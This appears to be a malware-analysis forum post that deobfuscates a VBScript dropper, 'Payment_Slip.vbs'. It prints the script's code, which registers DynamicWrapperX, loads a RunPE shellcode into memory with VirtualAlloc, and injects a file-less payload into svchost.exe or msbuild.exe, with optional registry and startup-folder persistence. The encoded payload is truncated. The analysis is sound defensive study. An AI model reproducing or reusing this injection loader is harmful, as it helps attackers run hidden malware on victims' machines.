Malware Analysis Payment_Slip.vbs - a script with API calls & file-less payload : injection - updated

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende

Why this sample ?

It's easy to deobfuscate the first part, but the real part is very interesting : a dll and file-less malware are inside the script:
=> DynamicWrapperX for DLL function calls.
=> a loader copied on memory
=> a malware binary part copied on memory

=> injection on targeted the host process​
2/52 when posting
Antivirus scan for f0c6e212714e5fa40f38b67d5f59e3afefbd322da1bca2a429f9bb9cb1e0ffdc at 2016-10-19 15:42:57 UTC - VirusTotal

VBScript

1) what it looks like :
'ÿæñ$%ý#å.ý"æèö(ì!êþç&#)%åõêó.+ï/ìðë-ÿ%øýð/
dim SUNVBCGETVG
',ë-ö"þ!ëûÿýòÿå(û)ü#÷ûö'ëåïûú"// ðõ&./#ë-ýì
'êêý+êîþêù*óþð),öç!í'û+. þ+'òê..ôô.-/ò!ðì ñ)&ÿ.#èøêïþú'ø(ëü
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...
=> 1.651.672 chars on the string !
...
"
'ìèûçò(è.(÷æ#ì&/ëêîú!îííèö'ïýû#ê&ïúò"÷&ð"/'ù
'õüêìôñþ/úúöêúÿ!ü'ýñ÷ö#&'ö/&.øïý-$ûþçñìû.íþ&()ó&$ëü'! "+
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) '!!èó#æ ì$&%ýùý(ú*þþý( ('øæõ-í/ø%íå(íÿ íé,èè)'%é",
'ü(ñ&îíú(üó ì!()ôû ñö!ýèû""&÷öõ%"øêù$"øõ'õöñ,ùéêóð$ë#ú
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC) '÷ç÷%-î%ò),ê-ì+,òðöûýóóôþú(òú*ö.êùï/êþü./øéêéð!"/å+éôù*î
'%þíæ(!çæ$ë-éð&*$ìöøçó*!+óúýù÷óððéü+ê(þí+%íçé
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
'ÿ'÷ê#"!û÷÷ç ""þïóè"æý ö*ú.ê)-óõ.&+òæ%&#,+ô'÷ø.ÿ(ðõ)ñ& .!õê.æôå"ê/ý÷.çÿ.*,ùú-
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK) 'øï(üð" ïüÿ,$ê ïïê ù"öæö& *"#!èæ÷öêó÷î/åñ,&í%òôù(+.$/í,ìý&ìçõ
'üý%ùò,-&ìó.ï-ö&#ýù*ñ/%(,ûïýðþ÷ö*#ï/ü("õøòé+
BSBPIFYBTESIP = BSBPIFYBTESIP + 21 '$æíü÷óñ%"ÿï-+-ý)õþ.õýýèó!íæ#úî ïýöô÷!ð%
'*ø î.-*/éì),ïñ+ñ$*$éç ü!éíðö!åì-åæòîõ&þö.õó"øî++"$ñ%'íî÷
Next 'ìö-î÷%íí(ç-ý-é÷êóé!è#ïúìëè*#
'çí$+,ô-þï#ê/$æ+øíôú%'ýõðôè&ü"íòí-
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH 'èø/#ëó+çõìø&,ôôú ó÷éì!"#üóðö+.(ùþ-èå
'%úÿûòë#-é((ÿ#þ#ìñöñ)ùå-êþ**øëìñóùõî õ/ çñúù* %ë%(ðõííýüç'!&å%ç/ë#ðî
End Function '&$îç%÷*î+øÿ'%*.ëû$ûúèíèûê ëö#+ëæñùüé
'/+/þ!ó#éôýì.ô#$/ù,ýøæðÿÿíðÿï/(ÿì


2) Deobfuscation :
2-1 ) Quick clean :
A lot of part uses the char for comments : ' with useless chars after.

I cleaned it, here are the obfuscated script without false comment parts :​

dim SUNVBCGETVG
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...
=> 1.651.672 chars on the string !
...
"

Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG))

Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)

For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH
End Function
2-2 ) How it works :

SUNVBCGETVG :

=> A very long string with the real content, obfuscated.​

Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) :

=> CLHHFSRSPXGUHEQJ(SUNVBCGETVG) : calls a function with the obfuscated string as parameter
=> Execute => evaluate the result
Let's see understand the function.

Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH
End Function

A loop FOR is used, from index 1 to index "the length of the obfuscated String".

In the loop :

- Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3) :

=> retrieve 3 chars on the obfuscated string, from current index, and delete the "-" occurrences​
- CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)

=> add to a string (that was an empty string at the beginning ) the char after a CharCode to char technique :
& Chr(YHRDSIPKZK) : with a string as parameter that represent a decimal number, its equivalent to a char decimal code, and the Chr function gives the char correspondent
- BSBPIFYBTESIP = BSBPIFYBTESIP + 21 :

Index = index +21
Example :

Result = ""
index : 1
retrieves "13-"
=> "13"
Result = Result & char("13") => on VBScript & is a concatenation
Result = "\r" => char return
index = index +21 = 22

Next loop:
Result = "\n"
index : 22
retrieves "10-"
=> "10"
Result = Result & char("10") => 10 : ascii for newline : "\n"
Result = "\r\n"
index = index + 21 = 43

Next loop:
Result = "\r\n"
index : 43
retrieves "39-"
=> "39"
Result = Result & char("39") => 39 : ascii for ' (try ALT+39 :) )
Result = "\r\n'"
index = index + 21 = 43

Etc,..

At the end, it return a String with real bad content, and this string is Executed​

2-3 ) Conclusion for the obfuscation used and Malware part :

Only decimal ASCII codes on a string with "--------"

Real Content :
I cut a lot of strings that contain long data, to protect you and avoid too much lines :oops:
'=-=-=-=-= CONFIG =-=-=-=
HOST_FILE = "system32\\Svchost.exe"
FILE_NAME = "
injector.vbs"
INSTALL_DIR = "
%temp%"
START_UP_REG = false
START_UP_TASK = false
START_UP_FOLDER = false


COMMAND_LINE = ""
'=-=-=-=-= CONFIG =-=-=-=
ON ERROR RESUME NEXT
'=-=-=-=-= GLOBAL =-=-=-=
SET FILESYSTEMOBJ = CREATEOBJECT ("SCRIPTING.FILESYSTEMOBJECT")
SET SHELLOBJ = WSCRIPT.CREATEOBJECT ("WSCRIPT.SHELL")
DIM I

'=-=-=-=-= GLOBAL =-=-=-=

'=-=-=-=-= CONSTO =-=-=-=
DCOM_DATA = _
"TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0KJLQJugAB" & _
"zSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20AUEUAAEwBBwA1dfhI" & _
...
...

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="

LOADER_DATA = _
"VYvsg8T4U1ZXi30Mi3UIjV38M8BVaP9QQABk/zBkiSDolwcAAIkDiwMFIAEAAFDoEAIAAFDo" & _
"LgIAAFDonAIAAIsTiYIcAQAAiwMFLAIAAFDo7wEAAFCLAwUcAgAAUIsD/5AcAQAAUOhwAgAA" & _
...
...
"AAAAAAAAVmlydHVhbEFsbG9jRXgAAAAAAABWaXJ0dWFsQWxsb2MAAAAAAAAAAFZpcnR1YWxG" & _
"cmVlAAAAAABUZXJtaW5hdGVQcm9jZXNzAAAAAAAAAABHZXRDb21tYW5kTGluZVcAbnRkbGwu" & _
"ZGxsAAAAAAAAAE50VW5tYXBWaWV3T2ZTZWN0aW9uAAAAAA=="

DIM FILE_DATA(10)
FILE_DATA (0) = "r8dBsj08fFQn9bEppowJqKQHJrby/RIW7UaFku4LEGf4AGbYizwN0CQeOrAjwuv08bsyfCU2yWTFw3RfHafgwrZJmhQ1HHVMR9ji2mB2jgjUOz4mWPkU/w58jQ7lL/ixLVXN4cl9yKpyqgBKVrb4LSOI2VVyZ318+qWpkTw4aH16920...
...
HcQ1BqnApX2fk5AuAIf4nh4r5sE1hK5nbe4YJiNrNkyw8CaQqklC5B/r3PkAtdd6mCH6xZOkZ9ZBD8dnxcca91UvxnLuhFtv7cphTajYg=="

FILE_DATA (1) = "twmMywo8/w6GRCk3AFQlOcwH8F53ufKnkayKaBgBKwcAQaYPiFbAFN34Gny6IBCP3xN3E7ZwtIajKPaY4ocVNxRvZAAPhw+xvxuA3Mz0EwpXT/TlreVWiVtWo2xV/wQ9Je/CJD53J+3yCHojmE1FVJUCHXY49JinZBPxNEoeG7YV
...
...
3yyxqzBxUPhsnt4jBLo/7QC+Q+YhWLhkA3P4hSa8NksKQpi+6A1y4BhGKNaVGR7fM/OKMH1cgQ39DS2bnmZtzPlFidmAPh9Anb3UqjGuWT2mIX/2BQ5O7FNI1GAQSpS4Ww+lTxzYJi1YfMhuMQmkdgESlcGOUB0LhCa9fDhL3AR2w=="
FILE_DATA (2) = "glOqrreb+sKq4EjO5ArP9e94gBR1Q+jgOA7Oks+WQ/Zd41US7ZoBG2C6Vj3HN2tgxm7y7oElRnn0yXTFPfBW+OX9dVyQh2rB1XOpuIKiaZjTC98S+2iTkajGVPOrLqnQBGxKgEOKBDKNGVDzMX+g1SYgTJHjdYdreANAWh3oOn5HMS....
...
PT4jyMg37rx8qR8W1v8ttPrlBSqE5AG+V6N+bO592gBWbgcKznqn0wKf8bm5cMb5vUjv3/X5QOmeE5aspAIvKty9PZPESKFGyKt4I29BtVkqND6WtMqvttvQuwgjAtakxNoXyscAhVArCuxmB+wew0PEMuMvvz2INbh9J/lYOlwlrWJjOg=="
FILE_DATA (3) = "WxZwRHaSiMHGatFfQfM3JAaR8jDoAmkneR8b7mhlK+8iKwZgtfZX+tOAstB0L2RRYQBKFvD8Jm62Tmz32uIaVYHWv.DFXaqI5ixYKgUMlmeUTz/L8QIMHu33XqmzsseXFxLO9qHNNuXc48oiKqCTr69ZbdeTENYJJ1Nen/0WS6BBHt...
...
tVhs+TTZZKdQD1457k/2YQLgleCkfvYrgiocw11+GRzgDVno+7gioC9oTGHgoNPO+vh9kAHNNDT/AJwpjnUmd9zxZalXAP3ATs39B0vr4uIrOGOH2/wfnXTRMw7E5o/mGZ4L0EYn6UP17hmOQ5EBsMC0XY7gOk1zxvzsSMRzVAE1HsdMDilcO6GyworcYacAO+feZT1tjFa11t8AU2NivZlfbWoWrQ=="

FILE_DATA (4) = "ZzO6bAUjg6JsyDZemhj37xWh0B6iozPBBi438JzKgSXUlMF0/X9W6h3zBSUoYmDsbHpvGKPfCkBJVgEb+7TLLPnqo+1G0EkO/NlKy7tvgqA8jvAjFAwVvtoIMCCCYh63rCPRnK6P8xjuUCunYppuPTw9yAnizPP2fU8YPD2R9SXQfhzgXC...
...
99OTNPfnpwYrfjefeHNyfYSXUS6Vd2DpB3GewfOCx5jvyTCMXqW/OaU4vYK3sH9MvZOuAt0gimvyL/7HNU4Ocia0eHbe2aKPpkKzVBDzWVwFtFzPEFnBZSrHN0hvw=="

FILE_DATA (5) = "MJNqIdZ1uXStpejnW5CpqDgtnby/vIUOEyh95BhKhc+By5XMH43OhaoQ8DaS/jo1tCyPl2EiMN2HRaLZg7lbjd6b6ic6o.sqhIAmubRGtJ5emVmLxH3avnaiiepZbz+39urg//3TBLlUOGe2j7E03Zubs9e8PywkfpASWjqknNnP1G9KEHg...
...
McJoX08PLHa+QHqh5hSUr54hVadQftCdbcCmTF9vBsdUm6R9IqGYa3AolZ4mFYOnveLcxfDOVOOyWY5xsLlOOGud1y8RJG2aXoQ7MRm1eo5kIHUsDCR9dVem+ArOow=="

FILE_DATA (6) = "x4fzHD8BvenVSFZuBvNL9YJmBjYdSkKDtbtzCek9LJEBw8tVwHEQnSi95n91HnK6AohNfNlPef7njeIpUZQbshBtVipYuo2h5Z+DY7FhVHFjNoh/RSV8chen6q6mds6h0ZkatwnARYUOPMP34hSG44pxellgtramKOFOenOLivA3/bkIiz....
...
Dp58PTJtZOl5yzuTlGdA5F/u9hgZTszlo8/Bbut7NL01rOWFGbZOa1nITRJyy5L/7ruVEALeiymQOzy+LDzaU5ZTc7/Utgfm+VQ7HX54UKfdQjLmLD1DBZTiKEztNcJ5HIYNIW53yaXQ0KZNCA=="

FILE_DATA (7) = "V7YaHTaF8+ho4vZz9FpWiy2/uJV18nQ9hx1ERmGqgMn51Y3YavcBBADiIe33FOYxhGJxmu8zAlCVJizhpCepw4tmpikDkrJnVUhG60VwMrvY2rySeiFhGyOl75bjH+GXlo4Jx1GtEfz0jwAKoEGUgBnXU9i5veroF50DjmGk1oMyrHAF....
...
tCig4hbSu/ZBNpmwrMm14QycNecqJXb+KcyERChxqslnyQ9DeZGu4ODhYTeY+L1uVfQQCJ7yxFHeLA0h5eD4sLsPzQqosnj8ezF58VU/LHsZZNCtWgExr0X+MtdW/CMPVAb+pDynmi3tUpYZRyg=="

FILE_DATA (8) = "6DGvTSwA7nUrhI66OqmEElJTbMPU3DyR6FVnyTbh6gj56u954fvPcxLS197EJOr1BXYSebRNKSAj/TbdqizPsEqLd18m.tFORl5CCLvioHzPKgoAQbbRuPYhz3F+fIg7x4w4nIL2agbubZ/taz6EHRNTdpOOxukKzS7+PvP3IlnJRzyeEncZ...
...
7Rvus5Eq1NxZwGlJwkwPhu5PoSk5dnZ5rrPUdcP0KwFOAK5t+a3PHgLYuzGIQIUItrV2HOrM0fU2ZgPHkcjyQmELUrkpBz7sFHo/KrzI24jmnzhVpLV/TGIESZni7ViJHtw=="

FILE_DATA (9) = ""

FILE_SIZE = 35328

'=-=-=-=-= CONSTO =-=-=-=

'=-=-=-=-= MYCODE =-=-=-=
START
FIX_WOW64

DCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME & ".BIN"
IF NOT IS_DOTNET THEN
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%" & "\\" & HOST_FILE)
ELSE
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%")&"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE"
END IF


WRITE_FILE DCOM_NAME,TEXTTOBINARY(DCOM_DATA, "BIN.BASE64")

DO
SHELLOBJ.RUN "REGSVR32.EXE /I /S "& CHR(34)&DCOM_NAME& CHR(34),0,TRUE
SET DCOM = CREATEOBJECT("DYNAMICWRAPPERX")
WSCRIPT.SLEEP 1000
LOOP UNTIL ISOBJECT(DCOM)

DCOM.REGISTER "USER32.DLL", "CallWindowProcW",LCASE("I=PHULL"), LCASE("R=U")
DCOM.REGISTER "KERNEL32.DLL", "VirtualAlloc",LCASE("I=PUUU"), LCASE("R=P")

LOADER_DATA = BASE64TOHEX (LOADER_DATA)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FILE_DATA(I) = BASE64TOHEX (FILE_DATA(I))
NEXT

LOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(LOADER_DATA)/2,4096,64)
FOR I = 1 TO LEN (LOADER_DATA) STEP 2
CHAR = ASC(CHR("&H"&MID (LOADER_DATA,I,2)))
DCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2
NEXT
COUNT = 0
PE_PTR = DCOM.VIRTUALALLOC (0,FILE_SIZE+1,4096,64)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FOR X = 1 TO LEN (FILE_DATA(I)) STEP 2
CHAR = ASC(CHR("&H"&MID (FILE_DATA(I),X,2)))
DCOM.NUMPUT EVAL(CHAR),PE_PTR,COUNT
COUNT = COUNT + 1
NEXT
NEXT
DCOM.CALLWINDOWPROCW LOADER_PTR,PE_PTR,DCOM.STRPTR (HOST_FILE),DCOM.STRPTR (COMMAND_LINE),0

SUB FIX_WOW64

SET OBJWMISERVICE = GETOBJECT ("WINMGMTS:\\\\.\\ROOT\\CIMV2")
SET COLITEMS = OBJWMISERVICE.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
FOR EACH OBJITEM IN COLITEMS
\tSYSTEMTYPE = OBJITEM.SYSTEMTYPE
NEXT
IF (UCASE(SYSTEMTYPE) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
SHELLOBJ.RUN SHELLOBJ.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\\SYSWOW64\\WSCRIPT.EXE //b //e:vbscript "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
WSCRIPT.QUIT
END IF

END SUB

SUB START ()
IF START_UP_REG = TRUE THEN
START_F = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,START_F ,TRUE
SHELLOBJ.REGWRITE "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\" & FILE_NAME,"WScript.exe //b //e:vbscript " & CHRW(34) & START_F & CHRW(34) ,"REG_SZ"
END IF
IF START_UP_FOLDER = TRUE THEN
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,SHELLOBJ.SPECIALFOLDERS ("STARTUP") & "\\" & FILE_NAME & ".vbs" ,TRUE
END IF
IF START_UP_TASK = TRUE THEN

END IF
END SUB

FUNCTION BINARYTOTEXT (BINARY, DATATYPE)

DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = BINARY
DOM.DOCUMENTELEMENT.REMOVEATTRIBUTE(LCASE("DT:DT"))
BINARYTOTEXT = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTION

FUNCTION TEXTTOBINARY (TEXT, DATATYPE)

DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = TEXT
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
TEXTTOBINARY = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTION

FUNCTION BASE64TOHEX(STRBASE64)

BASE64TOHEX = BINARYTOTEXT(TEXTTOBINARY(STRBASE64, "BIN.BASE64"), "BIN.HEX")
END FUNCTION

FUNCTION WRITE_FILE (FILE_NAME,FILE_DATA)

IF FILESYSTEMOBJ.FILEEXISTS (FILE_NAME) THEN EXIT FUNCTION
CONST ADTYPEBINARY = 1
SET BINARYSTREAM = CREATEOBJECT("ADODB.STREAM")
BINARYSTREAM.TYPE = ADTYPEBINARY
BINARYSTREAM.OPEN
BINARYSTREAM.WRITE FILE_DATA
BINARYSTREAM.SAVETOFILE FILE_NAME
SET BINARYSTREAM = NOTHING
END FUNCTION

3) Explanation of the real content :

All parts are in UPPERCASE, and I really think it hurts the eyes :confused:
So, on below parts, I made all uppercase (to avoid become blind ...)

3-1) Config / global data :

Here are important data that will be used late, and help the script to make decision (some value tests ) :

'=-=-=-=-= CONFIG =-=-=-=
host_file = "system32\\svchost.exe"
file_name = "
injector.vbs"
install_dir = "
%temp%"
start_up_reg = false
start_up_task = false
start_up_folder = false

command_line = ""

'=-=-=-=-= config =-=-=-=
on error resume next
'=-=-=-=-= global =-=-=-=
set filesystemobj = createobject ("scripting.filesystemobject")
set shellobj = wscript.
createobject ("wscript.shell")
dim i

We can already see some well known part (if you have already followed some of my posts)

=> two objects are created, one for manipulation of files, the other for shell purpose​

3-2) Constant objects :

'=-=-=-=-= CONSTO =-=-=-=
dcom_data = .....
loader_data = .....
dim file_data(10)
file_data (0) = ....
file_data (1) = ....
...
file_data (9) = ....

file_size = 35328

Several Base64 encoded (very long) Strings are used.

We will see later that :

dcom_data => dll content (used to allows the api calls)
loader_data => encoded loader data used
file_data => array of encoded strings : malware parts

loader_data and file_data will be decoded and used for injection :D
3-3) Some functions :
binarytotext
texttobinary
base64tohex


For code manipulations the functions uses a MICROSOFT.XMLDOM object

Example :

function textToBinary (text, datatype)
dim dom
set dom =
CreateObject("MICROSOFT.XMLDOM")
dom.loadXML("<HELLO/>")
dom.documentElement.
nodeTypedValue = text
dom.
documentElement.dataType = dataType
textToBinary= dom.documentElement.nodeTypedValue
end function
Here, using a dom object, the conversion is very easy
write_file

function write_file (file_name,file_data)
if fileSystemObj.fileExists (file_name) then exit function
const adTypeBinary = 1
set binarystream =
createobject("adodb.stream")
binarystream.
type = adtypebinary
binarystream.
open
binarystream.write file_data
binarystream.
saveToFile file_name
set binarystream= nothing
end function

it uses the fileSystemObject object created in the global data part (see 3-1) )
Uses an adodb.stream object to create a file on HD, with path and data as parameters
3-4 ) How it works :

In VB, a function can return a value, Sub doesn't (other differences, but not important here).

'=-=-=-=-= MYCODE =-=-=-=
start

calls a sub that do its job or not according to the below Boolean / values :

start_up_reg
start_up_task
start_up_folder

sub start ()
if start_up_reg = true then

=> it modifies the registry to make the actual script run when pc run

start_f = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name
filesystemobj.copyfile wscript.scriptfullname,start_f ,true
shellobj.regwrite "hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\\" & file_name,"wscript.exe //b //e:vbscript " & chrw(34) & start_f & chrw(34) ,"reg_sz"
end if
if start_up_folder = true then

=> it puts the script on startup folder

filesystemobj.copyfile wscript.scriptfullname,shellobj.specialfolders ("startup") & "\\" & file_name & ".vbs" ,true
end if
if start_up_task = true then

=> empty part
end if
end sub

In the current script :

start_up_reg = false
start_up_task = false
start_up_folder = false
=> the start sub makes nothing​
fix_wow64

sub fix_wow64
set objwmiservice = getobject ("winmgmts:\\\\.\\root\\cimv2")
set colitems = objwmiservice.execquery ("select * from win32_computersystem")
for each objitem in colitems
\tsystemtype = objitem.systemtype
next
if (ucase(systemtype) = "x64-based pc") and (instr (ucase(wscript.path),"syswow64") = 0) then
shellobj.run shellobj.expandenvironmentstrings("%windir%")&"\\syswow64\\wscript.exe //b //e:vbscript "&chr(34)&wscript.scriptfullname&chr(34)
wscript.quit
end if
end sub

it forces to use the syswow64\wscript.exe if the initial script was run on a 64 bit OS (if needed, runs another instance of the current script with the targeted wscript.exe before wscript.quit )

=> syswow64 :

"32-bit applications that include only 32-bit kernel-mode device drivers, or that plug into the process space of components that are implemented purely as 64-bit processes (e.g. Windows Explorer) cannot be executed on a 64-bit platform. 32-bit service applications are supported. The SysWOW64 folder located in the Windows folder on the OS drive contains several applications to support 32-bit applications"​
dcom_name = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name & ".bin"

=> file_name = "injector.vbs"
=> install_dir = "%temp%"

=> dcom_name : %temp%\injector.vbs.bin​
if not is_dotnet then
host_file = shellobj.expandenvironmentstrings ("%windir%" & "\\" & host_file)
else
host_file = shellobj.expandenvironmentstrings ("%windir%")&"\\microsoft.net\\framework\\v2.0.50727\\msbuild.exe"
end if

Here, the host_file :​

"%windir%\system32\svchost.exe" if the Framewort .NET is NOT installed
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"​

write_file dcom_name,texttobinary(dcom_data, "bin.base64")

it creates the injector.vbs.bin (after base64code decoding) from functions we have seen in part 3-3)
and from hard coded data on dcom_data obfuscated string

What is this file ? A dll file, in reality :D
What is this dll s for ?
Hahaha, see below :)

do
shellobj.run "regsvr32.exe /i /s "& chr(34)&dcom_name& chr(34),0,true
set dcom =
createobject("dynamicwrapperx")
wscript.sleep 1000
loop until isobject(dcom)

=> a Loop to register the file injector.vbs.bin and create an object dynamicwrapperx

dcom.
register "user32.dll", "callwindowprocw",lcase("i=phull"), lcase("r=u")
dcom.
register "kernel32.dll", "virtualalloc",lcase("i=puuu"), lcase("r=p")

=> Now I can explain you :

- a dll (injector.vbs.bin) is registered,
- an object "dynamicwrapperx" is created => dcom
- this object is used to register two functions from API :

injector.vbs.bin is in fact dynamicwrapperx.dll
An ActiveX component (COM server) that allows to call functions exported by DLL libraries, in particular Windows API functions, from scripts in JScript and VBScript.

=> callwindowprocw and virtualalloc can now be called from the script.
loader_data = base64tohex (loader_data)
for i = 0 to ubound (file_data) -1 step 1

file_data(i) = base64tohex (file_data(i))
next

=> The loader_data and and file_data Strings are now deobfuscated​

loader_ptr = dcom.
virtualalloc (0,len(loader_data)/2,4096,64)
for i = 1 to len (loader_data) step 2

char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2
next
count = 0

=> uses virtualalloc to reserve memory in the virtual address space of the calling process
=> loader_ptr is a pointer to this part on allocated memory
=> loader_data is put on allocated memory after some modifications :

- single loop For because loader_ptr is a string

char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2

=> mid (loader_data,i,2) takes two chars from current index i
=> "&h" is added at the beginning to tell to the char function that the string has to be considered as a HEX representation :

- example : "&h41" (HEX) will not give the same result as "41" (decimal)
=> chr("&h41") => 'A'
=> chr("41") => ')'​
=> char = asc(chr(...) ) :
gives the ASCII code (decimal)
=> dcom.numput eval(char),loader_ptr,(i-1)/2

writes the number at the loader_ptr address with (i-1)/2 offset​
pe_ptr = dcom.virtualalloc (0,file_size+1,4096,64)
for i = 0 to ubound (file_data) -1 step 1

for x = 1 to len (file_data(i)) step 2
char = asc(chr("&h"&mid (file_data(i),x,2)))
dcom.numput eval(char),pe_ptr,count
count = count + 1
next
next

=> uses virtualalloc to reserve memory in the virtual address space of the calling process
=> pe_ptr is a pointer to this part
=> file_data is put on allocated memory after some modifications :

- multiple loops For because file_data is a tab of strings :

=> each string are handled by index i and for each, index x is used to make the job :

=> HEX representation of strings (two chars) to ASCII code
=> writes the number at the pe_ptr address with count offset​
=> THE FILE-LESS MALWARE

C++ :


LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
Here, for both memory allocations, only two parameters are used : lpAddress = 0, and the second parameter is the size to be allocated

=> the return value is the pointer to the beginning of the allocated data​
dcom.callwindowprocw loader_ptr, => the RunPE shellcode
pe_ptr, => A pointer the malware
dcom.strptr (host_file), => pointer to the host_file string
dcom.strptr (command_line), => pointer to the command_line (here : "")
0

=> the loader is called, and this one injects the malware part on the targeted host_file

=> run the malware part

Remember, in this script the host_file is :

"%windir%\system32\svchost.exe" if the Framewort .NET is NOT installed
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
C++ :

LRESULT WINAPI CallWindowProc(
_In_ WNDPROC lpPrevWndFunc,
_In_ HWND hWnd,
_In_ UINT Msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top